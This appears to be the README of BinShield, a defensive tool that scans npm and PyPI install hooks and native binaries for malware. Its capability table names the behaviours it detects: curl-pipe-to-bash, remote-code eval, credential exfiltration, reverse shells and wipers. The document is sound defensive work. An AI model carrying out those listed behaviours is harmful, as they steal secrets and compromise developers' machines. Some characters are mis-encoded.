Catch malicious install scripts and native binaries in your dependencies β before they reach production.
BinShield is a supply-chain security platform for the npm and PyPI ecosystems. It analyzes the two things attackers actually weaponize β install scripts and native binaries β classifies their behavior with AI, cross-references known-malware feeds, and warns you the moment a package you depend on turns malicious.
π binshield.dev Β· π GitHub Action Β· π Docs
A wave of supply-chain worms β Shai-Hulud and its kin β has shown how fast a single compromised npm/PyPI package spreads. Two attack surfaces matter:
- Install scripts. A malicious
postinstallhook (or a PyPIsetup.py) runs arbitrary code on every machine that installs the package β stealingNPM_TOKEN/cloud credentials, opening reverse shells, dropping wipers. Most SCA tools never read thescriptsfield. - Native binaries. Compiled
.node/.so/.dylib/.wasmaddons hide payloads that no source-level scanner decompiles.
BinShield covers both.
| Capability | Detail |
|---|---|
| Install-script analysis | Scans npm lifecycle hooks (preinstall/install/postinstall/prepare) and PyPI setup.py/pyproject.toml for curl|bash, eval of remote code, credential exfiltration, wipers, reverse shells, and obfuscated payloads. |
| Native binary analysis | Ghidra-powered decompilation (with a heuristic fallback) plus YARA pattern matching on .node/.so/.dylib/.wasm. |
| AI classification | xAI Grok classifies decompiled binaries and install scripts into a supply-chain threat taxonomy; a deterministic heuristic floor runs when AI is unavailable. |
| Known-malware feed | Cross-references every scan against OSV malicious-package advisories (MAL-*); a confirmed match forces a critical verdict. |
| Proactive alerts | When a malicious package is discovered, BinShield matches it against your watchlists and scanned lockfiles and alerts you via email / Slack / webhook. |
| CI gating | A GitHub Action scans every PR's dependencies and blocks merges on risky packages. |
| Reports | CycloneDX SBOM export and SOC 2 / ISO 27001 / EU CRA compliance reports. |
flowchart LR
subgraph Sources
A[API / Dashboard scan] --> Q
F[npm registry feed] --> Q
C[Crawler / discovery] --> Q
end
Q[analysis_jobs queue] --> W
subgraph W[Analysis worker]
direction TB
AC[Acquire package] --> EX[Extract binaries]
AC --> MS[Install-script analysis]
EX --> DC[Decompile + YARA]
DC --> CL[AI classify]
MS --> CL
CL --> RS[Risk score + malware feed]
end
RS --> DB[(Supabase)]
RS --> AL[Alert loop]
DB --> WEB[Web app]
DB --> ACT[GitHub Action]
AL --> N[Email / Slack / Webhook]
corepack enable # provides pnpm 10
pnpm install
pnpm dev # web app at http://localhost:3000BinShield ships a demo fallback β the web app, API, and worker all run without live credentials (seeded corpus, in-memory store, bundled fixtures), so you can explore the product before wiring up Supabase / xAI / Stripe.
pnpm --filter @binshield/api dev # API server
BINSHIELD_WORKER_MODE=daemon pnpm --filter @binshield/worker dev # worker
pnpm typecheck && pnpm test && pnpm build # the validation gateAdd the GitHub Action to block malicious dependencies on every PR:
- uses: ashlrai/binshield/apps/github-action@v1
with:
api-key: ${{ secrets.BINSHIELD_API_KEY }}
fail-on: highSee apps/github-action/README.md for inputs,
scan modes, and SBOM export.
| Path | Description |
|---|---|
apps/web |
Next.js 15 frontend β public package database and dashboard |
apps/api |
Hono API β search, scans, orgs, advisories, billing |
apps/worker |
Analysis worker β binary + install-script pipeline, feed, crawler |
apps/github-action |
CI scanner that gates PRs on dependency risk |
apps/video |
Remotion project for the demo video |
packages/analysis-types |
Shared domain types and sample data |
packages/risk-engine |
Deterministic risk scoring |
packages/config |
Environment parsing and product constants |
packages/ui |
Shared UI components |
packages/cli |
Command-line entry points |
MIT β see LICENSE.